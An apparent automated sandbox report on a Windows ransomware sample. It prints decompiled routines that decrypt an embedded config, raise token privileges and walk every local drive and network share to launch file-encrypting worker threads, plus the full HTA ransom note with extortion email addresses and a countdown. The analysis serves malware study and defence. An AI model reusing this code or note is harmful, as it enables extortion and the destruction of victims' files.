    • GlobalFree.KERNEL32 ref: 004016F0
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: lstrcat$FileFindGloballstrcmpilstrlen$CloseSleeplstrcmp$AllocAttributesCreateFirstFreeHandleMemoryNextStatusThread
    • String ID: $ $F$Ug[R
    • API String ID: 1743110542-829370647
    • Opcode ID: 4dc6aadf99c061102afc8f237ffd88845ec39796d56319ad5cd229dcb5d01f25
    • Instruction ID: 09e95a69dfff6291da4a77d36d8e93e18ae8ba3574d23d213d765ecb4674e2ae
    • Opcode Fuzzy Hash: 4dc6aadf99c061102afc8f237ffd88845ec39796d56319ad5cd229dcb5d01f25
    • Instruction Fuzzy Hash: BC5173719006097ACB21ABA1CC4AFDF76ACAF44308F14047BF949B61F1DB7D9A848B5D
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 53%
    			_entry_(void* __ecx, signed int* __edx, void* __esi, WCHAR* _a4) {
    				int _v8;
    				long* _v12;
    				long _v16;
    				signed char _t32;
    				signed int* _t56;
    
    				_t56 = __edx;
    				_v8 = 0x10f0;
    				CryptAcquireContextA( &_v12, 0, 0, 0x18, 0xf0000000); // executed
    				_t32 =  &_v16;
    				_push(_t32);
    				 *((intOrPtr*)(_t32 + 0x10)) = E004017A2;
    				_push(0);
    				_push(0);
    				_push(0x2c);
    				L2();
    				 *_t56 =  *_t56 | _t32;
    				 *_t32 =  *_t32 + _t32;
    				asm("adc [esi], ah");
    				 *_t32 =  *_t32 + _t32;
    				 *_t32 =  *_t32 + _t32;
    				_t5 = __esi + 0x2f;
    				 *_t5 =  *((intOrPtr*)(__esi + 0x2f)) + _t56;
    				if( *_t5 <= 0) {
    					_v12 = _t32;
    					lstrcpyW(_v12, _a4);
    					 *((char*)(_v12 + lstrlenW(_v12) * 2 - 6)) = 0;
    					lstrcatW(_v12, L"Decoding help.hta");
    					if(GetFileAttributesW(_v12) == 0xffffffff) {
    						_v8 = CreateFileW(_v12, 0x40000000, 2, 0, 2, 0, 0);
    						WriteFile(_v8, "<html><head><hta:application id=1\r\nshowInTaskBar=no\r\ncaption=no\r\nborder=none\r\ninnerBorder=no\r\nscroll=no\r\ncontextmenu=no\r\nwindowstate=maximize />\r\n<script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!=\'undefined\'?Y:now.getFullYear();Z=Z?Z-1:now.getMonth();D=typeof(D)!=\'undefined\'?D:now.getDate();H=typeof(H)!=\'undefined\'?H:now.getHours();M=typeof(M)!=\'undefined\'?M:now.getMinutes();var endDate=new Date(Y,Z,D,H,M,s+1);var i=setInterval(function(){var t=endDate.getTime()-now.getTime();if(t<0){clearInterval(i);alert(\'Time is up!\');}else{var d=Math.floor(t/864e5);var h=Math.floor(t/36e5)%24;var o=Math.floor(t/6e4)%60;var p=Math.floor(t/1e3)%60;var i=\'<div style=\"width:90px;float:left;text-align:center\"><div style=\"font-size:65px;\">\';var l=\'</div><div>\';var e=\'</div></div><div style=\"float:left;font-size:60px;\">:</div>\';document.getElementById(\'X\').innerHTML=i+d+l+\'Day\'+e+i+h+l+\'Hours\'+e+i+o+l+\'Minutes\'+e+i+p+l+\'Seconds\';if(!p&&!o&&!d&&!h){clearInterval(i);alert(\'Time is up!\');}}now.setSeconds(now.getSeconds()+1);},1000);}C(00,00,12,04,05,2019);</script></head><body style=\'text-align:center;background:#000\'></br></br></br><h2 style=\'font-size:40px;color:#b00\'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonStokton@tutanota.com</h2></br></br><h1 style=\'color:#FFF\'>Your<h2 style=\'font-size:40px;color:#00F\'> [ID]XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!</br>Attention!!!</br>At the end of this time, the private key for generating the decoder will be destroyed. 
Files will not be restored!</h1></br></br><div id=\'X\' style=\'position:absolute;left:40%;color:#F00\'></div></body></html>",  *0x403ab3,  &_v16, 0);
    						CloseHandle(_v8);
    						SetFileAttributesW(_v12, 1);
    					}
    					return GlobalFree(_v12);
    				} else {
    					_push(0x35682128);
    					_push(_t59);
    					asm("enter 0xaaf5, 0x2b");
    					asm("out dx, al");
    					CryptImportKey(_v12); // executed
    					CryptDecrypt(_v16, 0, 0, 0, 0x403000,  &_v8);
    					CryptDestroyKey(_v16);
    					return CryptReleaseContext(_v12, 0);
    				}
    			}

    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 0040101C
      • Part of subcall function 00401063: CryptImportKey.ADVAPI32(?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 00401066
      • Part of subcall function 00401063: CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018), ref: 0040107D
      • Part of subcall function 00401063: CryptDestroyKey.ADVAPI32(?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000), ref: 00401085
      • Part of subcall function 00401063: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?), ref: 0040108F
    • lstrcpyW.KERNEL32 ref: 004010AF
    • lstrlenW.KERNEL32(?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010B7
    • lstrcatW.KERNEL32(?,Decoding help.hta), ref: 004010CC
    • GetFileAttributesW.KERNEL32(?,?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010D4
    • GlobalFree.KERNEL32 ref: 00401128
    Strings
    • Decoding help.hta, xrefs: 004010C4
    • <html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined, xrefs: 00401106
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: Crypt$Context$AcquireAttributesDecryptDestroyFileFreeGlobalImportReleaselstrcatlstrcpylstrlen
    • String ID: <html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined$Decoding help.hta
    • API String ID: 2688160159-1737463546
    • Opcode ID: 7721281fa758cef1ce9fff004fb30370131a85719aa4915ed6ac0c0d516afdbb
    • Instruction ID: 68a9d78d6d026e3dd9675324c0a2f0f086f07bf2083e379a553c6848c7f92135
    • Opcode Fuzzy Hash: 7721281fa758cef1ce9fff004fb30370131a85719aa4915ed6ac0c0d516afdbb
    • Instruction Fuzzy Hash: 4021C130944348BADF22ABA1CD46F8EBF75EF05708F1040ABB240BA0F2C7B95A519758
    Uniqueness

    Uniqueness Score: -1,00%

    Control-flow Graph

    C-Code - Quality: 53%
    			_entry_(void* __ecx, signed int* __edx, void* __esi, WCHAR* _a4) {
    				int _v8;
    				long* _v12;
    				long _v16;
    				signed char _t32;
    				signed int* _t56;
    
    				_t56 = __edx;
    				_v8 = 0x10f0;
    				CryptAcquireContextA( &_v12, 0, 0, 0x18, 0xf0000000); // executed
    				_t32 =  &_v16;
    				_push(_t32);
    				 *((intOrPtr*)(_t32 + 0x10)) = E004017A2;
    				_push(0);
    				_push(0);
    				_push(0x2c);
    				L2();
    				 *_t56 =  *_t56 | _t32;
    				 *_t32 =  *_t32 + _t32;
    				asm("adc [esi], ah");
    				 *_t32 =  *_t32 + _t32;
    				 *_t32 =  *_t32 + _t32;
    				_t5 = __esi + 0x2f;
    				 *_t5 =  *((intOrPtr*)(__esi + 0x2f)) + _t56;
    				if( *_t5 <= 0) {
    					_v12 = _t32;
    					lstrcpyW(_v12, _a4);
    					 *((char*)(_v12 + lstrlenW(_v12) * 2 - 6)) = 0;
    					lstrcatW(_v12, 0x40379e);
    					if(GetFileAttributesW(_v12) == 0xffffffff) {
    						_v8 = CreateFileW(_v12, 0x40000000, 2, 0, 2, 0, 0);
    						WriteFile(_v8, 0x403006,  *0x403ab3,  &_v16, 0);
    						CloseHandle(_v8);
    						SetFileAttributesW(_v12, 1);
    					}
    					return GlobalFree(_v12);
    				} else {
    					_push(0x35682128);
    					_push(_t59);
    					asm("enter 0xaaf5, 0x2b");
    					asm("out dx, al");
    					CryptImportKey(_v12); // executed
    					CryptDecrypt(_v16, 0, 0, 0, 0x403000,  &_v8);
    					CryptDestroyKey(_v16);
    					return CryptReleaseContext(_v12, 0);
    				}
    			}








    0x00401000
    0x00401006
    0x0040101c
    0x00401021
    0x00401024
    0x00401025
    0x0040102e
    0x0040102f
    0x00401030
    0x00401032
    0x00401037
    0x00401039
    0x0040103b
    0x0040103e
    0x00401040
    0x00401042
    0x00401042
    0x00401045
    0x004010a6
    0x004010af
    0x004010bf
    0x004010cc
    0x004010dc
    0x004010f7
    0x0040110e
    0x00401116
    0x00401120
    0x00401120
    0x0040112e
    0x00401047
    0x0040104c
    0x00401052
    0x00401055
    0x0040105d
    0x00401066
    0x0040107d
    0x00401085
    0x00401095
    0x00401095

    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 0040101C
      • Part of subcall function 00401063: CryptImportKey.ADVAPI32(?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 00401066
      • Part of subcall function 00401063: CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018), ref: 0040107D
      • Part of subcall function 00401063: CryptDestroyKey.ADVAPI32(?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000), ref: 00401085
      • Part of subcall function 00401063: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?), ref: 0040108F
    • lstrcpyW.KERNEL32 ref: 004010AF
    • lstrlenW.KERNEL32(?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010B7
    • lstrcatW.KERNEL32(?,0040379E), ref: 004010CC
    • GetFileAttributesW.KERNEL32(?,?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010D4
    • GlobalFree.KERNEL32 ref: 00401128
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Crypt$Context$AcquireAttributesDecryptDestroyFileFreeGlobalImportReleaselstrcatlstrcpylstrlen
    • String ID:
    • API String ID: 2688160159-0
    • Opcode ID: 7721281fa758cef1ce9fff004fb30370131a85719aa4915ed6ac0c0d516afdbb
    • Instruction ID: 68a9d78d6d026e3dd9675324c0a2f0f086f07bf2083e379a553c6848c7f92135
    • Opcode Fuzzy Hash: 7721281fa758cef1ce9fff004fb30370131a85719aa4915ed6ac0c0d516afdbb
    • Instruction Fuzzy Hash: 4021C130944348BADF22ABA1CD46F8EBF75EF05708F1040ABB240BA0F2C7B95A519758
    Uniqueness

    Uniqueness Score: -1,00%

    Control-flow Graph (basic blocks and edges recovered from the rendered graph; executed/not-executed colouring not preserved)
    • 118: 401de7-401dfc OpenProcessToken -> 119, 120
    • 119: 401e49-401e4a
    • 120: 401dfe-401e0e LookupPrivilegeValueA -> 121, 122
    • 121: 401e10-401e1b -> 123, 124
    • 122: 401e41-401e44 CloseHandle -> 119
    • 123: 401e26 -> 125
    • 124: 401e1d-401e24 -> 125
    • 125: 401e2d-401e3c AdjustTokenPrivileges -> 122
    C-Code - Quality: 100%
    			E00401DE7(CHAR* _a4, intOrPtr _a8) {
    				void* _v8;
    				int _v12;
    				struct _TOKEN_PRIVILEGES _v24;
    				int _t12;
    				int _t14;
    				int _t15;
    
    				_t12 = OpenProcessToken(0xffffffff, 0x28,  &_v8);
    				if(_t12 != 0) {
    					_t14 = LookupPrivilegeValueA(0, _a4,  &(_v24.Privileges)); // executed
    					if(_t14 != 0) {
    						_v24.PrivilegeCount = 1;
    						if(_a8 != 1) {
    							_v12 = 0;
    						} else {
    							_v12 = 2;
    						}
    						AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
    					}
    					_t15 = CloseHandle(_v8); // executed
    					return _t15;
    				}
    				return _t12;
    			}

    APIs
    • OpenProcessToken.ADVAPI32(000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,00403ABB), ref: 00401DF5
    • LookupPrivilegeValueA.ADVAPI32(00000000,00008000,00000000), ref: 00401E07
    • AdjustTokenPrivileges.ADVAPI32(00008000,00000000,00000001,00000000,00000000,00000000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500), ref: 00401E3C
    • CloseHandle.KERNEL32(00008000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000), ref: 00401E44
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Token$AdjustCloseHandleLookupOpenPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 3109822214-0
    • Opcode ID: 6261509aeb84146fd0344f28abf3e6b066f36324f230cbae9dab4de075546fd3
    • Instruction ID: 2d62ae5741bd0bd10fc8f8dde8b80465d76495da62fb8ef1b7503070adc41f60
    • Opcode Fuzzy Hash: 6261509aeb84146fd0344f28abf3e6b066f36324f230cbae9dab4de075546fd3
    • Instruction Fuzzy Hash: 05F03070540209BAEF10EB91CD06FAEB7BCAB04718F204136BE10B51E1D7B89B449BA9
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 58%
    			// Decrypts the embedded data block at 0x00403000 in place. The recorded API
    			// arguments show CryptImportKey receiving a 0x2c-byte blob, the size of a
    			// PLAINTEXTKEYBLOB holding a 32-byte key (the same length E0040128D exports for
    			// its per-file AES-256 keys). The strings other routines read from 0x403xxx
    			// (privilege name, process list, ransom-note file name, drive template) are
    			// therefore only readable after this has run, which is consistent with those
    			// addresses resolving to text in only one of the two memory dumps. The frame
    			// slots _t11 - 8 and _t11 - 0xc are the provider and key handles the decompiler
    			// could not name.
    			E00401063() {
    				void* _t11;
    
    				CryptImportKey( *(_t11 - 8)); // executed; hProv, blob at 0x401037, len 0x2c, no exchange key, flags 0, &hKey (see API list)
    				CryptDecrypt( *(_t11 - 0xc), 0, 0, 0, 0x403000, _t11 - 4); // hKey, no hash, Final == FALSE, flags 0, data, &length
    				CryptDestroyKey( *(_t11 - 0xc));
    				return CryptReleaseContext( *(_t11 - 8), 0);
    			}

    Instruction addresses of the listing above: 0x00401066 to 0x00401095

    APIs
    • CryptImportKey.ADVAPI32(?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 00401066
    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018), ref: 0040107D
    • CryptDestroyKey.ADVAPI32(?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000), ref: 00401085
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?), ref: 0040108F
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Crypt$ContextDecryptDestroyImportRelease
    • String ID:
    • API String ID: 1768642135-0
    • Opcode ID: 0cb5ec14dbd97b43e308b96a0546c7c58cdb3d5023f843da73e9d6abf324567d
    • Instruction ID: 2bc5181ffc75bb41a3a1a8c5b4f242b06071d8065f7857b9d8ecca6836cf1f6b
    • Opcode Fuzzy Hash: 0cb5ec14dbd97b43e308b96a0546c7c58cdb3d5023f843da73e9d6abf324567d
    • Instruction Fuzzy Hash: 52D09E34A40109B9DF11BBA1DC03F9CBA369F0070CF3041B6B100740F287B56A11560C
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 97%
    			// Recursive network-share discovery, started as a thread by E004016FF with
    			// _a4 == NULL (the root of the visible network). Containers (domains, servers)
    			// are recursed into; every connectable UNC share becomes an E004014CC worker
    			// thread on "\\server\share\*.*".
    			E00401131(struct _NETRESOURCE* _a4) {
    				char* _v8;
    				short* _v12;
    				int _v16;
    				int _v20;
    				void* _v24;
    				signed int _v32;
    				void* _v36;
    				int _t43;
    				int _t45;
    				char* _t46;
    				void* _t47;
    				int _t50;
    				struct _NETRESOURCE* _t56;
    				int _t58;
    				void* _t59;
    				intOrPtr* _t60;
    				void* _t71;
    				void* _t78;
    
    				_t43 = WNetOpenEnumA(2, 0, 0, _a4,  &_v36); // executed; RESOURCE_GLOBALNET, any type, any usage
    				if(_t43 != 0) {
    					L12:
    					_t45 = WNetCloseEnum(_v36); // executed
    					return _t45;
    				}
    				_v20 = 0x4000;
    				_t46 = E00401781(_v20); // executed; 16 KiB scratch buffer for the share path
    				_v8 = _t46;
    				_t47 = E00401781(_v20); // executed; 16 KiB for the NETRESOURCE array
    				_v24 = _t47;
    				_v16 = 0xffffffff; // cCount == -1: return as many entries as fit
    				_t50 = WNetEnumResourceA(_v36,  &_v16, _v24,  &_v20); // executed
    				if(_t50 == 0xea) { // ERROR_MORE_DATA: reallocate with the size the API reported and retry once
    					GlobalFree(_v24);
    					_v24 = E00401781(_v20);
    					_v16 = 0xffffffff;
    					_t50 = WNetEnumResourceA(_v36,  &_v16, _v24,  &_v20);
    				}
    				if(_t50 != 0) {
    					L11:
    					GlobalFree(_v8); // executed
    					GlobalFree(_v24); // executed
    					goto L12;
    				} else {
    					_v32 = 0;
    					while(1) {
    						_t56 = _v24 + (_v32 << 5); // sizeof(NETRESOURCEA) == 32
    						if( *((intOrPtr*)(_t56 + 0xc)) == 1) { // dwUsage == RESOURCEUSAGE_CONNECTABLE: a share
    							_t71 =  *(_t56 + 0x14); // lpRemoteName
    							if( *_t71 == 0x5c5c) { // must start with "\\"
    								_t58 = lstrlenA(_t71);
    								asm("cld");
    								_t59 = memcpy(_v8, _t71, _t58);
    								_t78 = _t78 + 0xc;
    								_t60 = _t59 + _v8;
    								 *_t60 = 0x2a2e2a5c; // append "\*.*" (bytes 5c 2a 2e 2a) ...
    								 *((char*)(_t60 + 4)) = 0; // ... and terminate
    								_v12 = E00401781(0x18060); // same buffer size E004016FF allocates for local drives
    								MultiByteToWideChar(3, 0, _v8, 0xffffffff, _v12, MultiByteToWideChar(3, 0, _v8, 0xffffffff, _v12, 0)); // inner call sizes, outer call converts
    								 *0x403ab7 =  *0x403ab7 + 1; // global worker-thread counter shared with E004016FF
    								CloseHandle(CreateThread(0, 0x10000, E004014CC, _v12, 0, 0)); // worker receives the wide path
    							}
    						} else {
    							E00401131(_t56); // executed; any entry that is not purely connectable is a container: recurse
    						}
    						_v32 = _v32 + 1;
    						if(_v32 >= _v16) {
    							goto L11;
    						}
    					}
    					goto L11;
    				}
    			}

    Instruction addresses of the listing above: 0x00401144 to 0x0040128a

    APIs
    • WNetOpenEnumA.MPR(00000002,00000000,00000000,?,?), ref: 00401144
    • WNetCloseEnum.MPR(?), ref: 00401284
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    • WNetEnumResourceA.MPR(?,FFFFFFFF,?,00004000), ref: 00401183
    • GlobalFree.KERNEL32 ref: 00401192
    • WNetEnumResourceA.MPR(?,FFFFFFFF,?,00004000), ref: 004011B7
    • lstrlenA.KERNEL32(?,00004000,00004000), ref: 004011EF
    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,?,00000000,00018060,?,00004000,00004000), ref: 00401226
    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,?,00000000,00000003,00000000,00000000,000000FF,?,00000000,00018060,?,00004000,00004000), ref: 00401238
    • CreateThread.KERNEL32 ref: 00401256
    • CloseHandle.KERNEL32(00000000,00000000,00010000,Function_000014CC,?,00000000,00000000,00000003,00000000,00000000,000000FF,?,00000000,00000003,00000000,00000000), ref: 0040125C
    • GlobalFree.KERNEL32 ref: 00401274
    • GlobalFree.KERNEL32 ref: 0040127C
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: EnumGlobal$Free$ByteCharCloseMultiResourceWide$AllocCreateHandleOpenSleepThreadlstrlen
    • String ID:
    • API String ID: 3520587307-0
    • Opcode ID: 9d12d4a99be906757fec16f8f7037c86217b6b9286bb6862ec45515e6ecea0d5
    • Instruction ID: e58090ff3f4ac20de8e3d49f50c8b8bbbfeb820762b890c8c6496d2121d6898d
    • Opcode Fuzzy Hash: 9d12d4a99be906757fec16f8f7037c86217b6b9286bb6862ec45515e6ecea0d5
    • Instruction Fuzzy Hash: F6414C70D4010AAEDF11EBE1CD42FAEBBB5AF08314F20416AF920BA1F1D7785A119B59
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 100%
    			// Entry point of the encryption phase. One thread walks the network
    			// (E00401131); then every bit set in the GetLogicalDrives mask, taken from
    			// bit 0x19 (Z:) down to bit 0 (A:), gets its own E004014CC worker thread on
    			// "\\?\X:\*.*". There is no GetDriveType check, so removable media and mapped
    			// network drives are included.
    			E004016FF() {
    				void* _v8;
    				void* _t4;
    				signed int _t6;
    				WCHAR* _t7;
    				WCHAR* _t8;
    				void* _t9;
    				signed char _t14;
    				void* _t15;
    
    				_t4 = CreateThread(0, 0, E00401131, 0, 0, 0); // executed; network enumeration from the root
    				CloseHandle(_t4); // executed
    				_t6 = GetLogicalDrives(); // executed; bit n set == drive 'A' + n exists
    				_t14 = 0x19;
    				do {
    					if((0x00000001 << _t14 & _t6) != 0) {
    						_t7 = E00401781(0x18060); // zeroed path buffer handed to the worker
    						_v8 = _t7;
    						_t8 = lstrcatW(_t7, L"\\\\?\\C:\\*.*"); // template; the letter is patched below
    						_t15 = _t14;
    						_t8[4] = _t15 + 0x41; // index 4 is the template's 'C': 'A' + bit
    						 *0x403ab7 =  *0x403ab7 + 1; // global worker-thread counter
    						_t9 = CreateThread(0, 0xffff, E004014CC, _v8, 0, 0); // executed; one worker per drive
    						CloseHandle(_t9); // executed
    						_t14 = _t15;
    						_t6 = _t6;
    					}
    					_t14 = _t14 - 1;
    				} while (_t14 >= 0);
    				return _t6;
    			}

    Instruction addresses of the listing above: 0x00401714 to 0x00401780

    APIs
    • CreateThread.KERNEL32 ref: 00401714
    • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_00001131,00000000,00000000,00000000), ref: 0040171A
    • GetLogicalDrives.KERNEL32 ref: 0040171F
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    • lstrcatW.KERNEL32(00000000,\\?\C:\*.*), ref: 00401749
    • CreateThread.KERNEL32 ref: 0040176F
    • CloseHandle.KERNEL32(00000000,00000000,0000FFFF,Function_000014CC,?,00000000,00000000,00000000,\\?\C:\*.*,00018060,00000019,00000000,00000000,00000000,00000000,Function_00001131), ref: 00401775
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: CloseCreateHandleThread$AllocDrivesGlobalLogicalSleeplstrcat
    • String ID: \\?\C:\*.*
    • API String ID: 3649909306-1790711283
    • Opcode ID: aa36bdb46a48c8bc4b72e55a2e5d77653a2ea84c6b11e826cca7d57258d30290
    • Instruction ID: b0a1643d7e9e57bc3e1be9d92316a81e3967ff597d52ac60f2e66cf42192e3bd
    • Opcode Fuzzy Hash: aa36bdb46a48c8bc4b72e55a2e5d77653a2ea84c6b11e826cca7d57258d30290
    • Instruction Fuzzy Hash: 62F06774B843013AFA1032B29C47F6F2A588B00B19F34013BBB00BA1F3D9FC6940426C
    Uniqueness

    Uniqueness Score: -1,00%

    Control-flow Graph (basic blocks and edges recovered from the graph image)

    • 111: 4016ff-401724 CreateThread CloseHandle GetLogicalDrives -> 112
    • 112: 401729-401732 -> 113, 114
    • 113: 401734-40177b call 401781 lstrcatW CreateThread CloseHandle -> 114
    • 114: 40177c-40177d -> 112, 116
    • 116: 40177f-401780
    C-Code - Quality: 100%
    			// Same routine as listed above, taken from the other memory dump: here the drive
    			// template at 0x403abf has not yet been decoded to L"\\?\C:\*.*", which is why
    			// the string does not appear in this copy. Behaviour is identical.
    			E004016FF() {
    				void* _v8;
    				void* _t4;
    				signed int _t6;
    				WCHAR* _t7;
    				WCHAR* _t8;
    				void* _t9;
    				signed char _t14;
    				void* _t15;
    
    				_t4 = CreateThread(0, 0, E00401131, 0, 0, 0); // executed
    				CloseHandle(_t4); // executed
    				_t6 = GetLogicalDrives(); // executed
    				_t14 = 0x19;
    				do {
    					if((0x00000001 << _t14 & _t6) != 0) {
    						_t7 = E00401781(0x18060);
    						_v8 = _t7;
    						_t8 = lstrcatW(_t7, 0x403abf); // template string, still encrypted in this dump
    						_t15 = _t14;
    						_t8[4] = _t15 + 0x41;
    						 *0x403ab7 =  *0x403ab7 + 1;
    						_t9 = CreateThread(0, 0xffff, E004014CC, _v8, 0, 0); // executed
    						CloseHandle(_t9); // executed
    						_t14 = _t15;
    						_t6 = _t6;
    					}
    					_t14 = _t14 - 1;
    				} while (_t14 >= 0);
    				return _t6;
    			}

    Instruction addresses of the listing above: 0x00401714 to 0x00401780

    APIs
    • CreateThread.KERNEL32 ref: 00401714
    • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_00001131,00000000,00000000,00000000), ref: 0040171A
    • GetLogicalDrives.KERNEL32 ref: 0040171F
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,00401160,?,00401160,00004000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,00401160,?,00401160,00004000), ref: 00401797
    • lstrcatW.KERNEL32(00000000,00403ABF), ref: 00401749
    • CreateThread.KERNEL32 ref: 0040176F
    • CloseHandle.KERNEL32(00000000,00000000,0000FFFF,Function_000014CC,?,00000000,00000000,00000000,00403ABF,00018060,00000019,00000000,00000000,00000000,00000000,Function_00001131), ref: 00401775
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: CloseCreateHandleThread$AllocDrivesGlobalLogicalSleeplstrcat
    • String ID:
    • API String ID: 3649909306-0
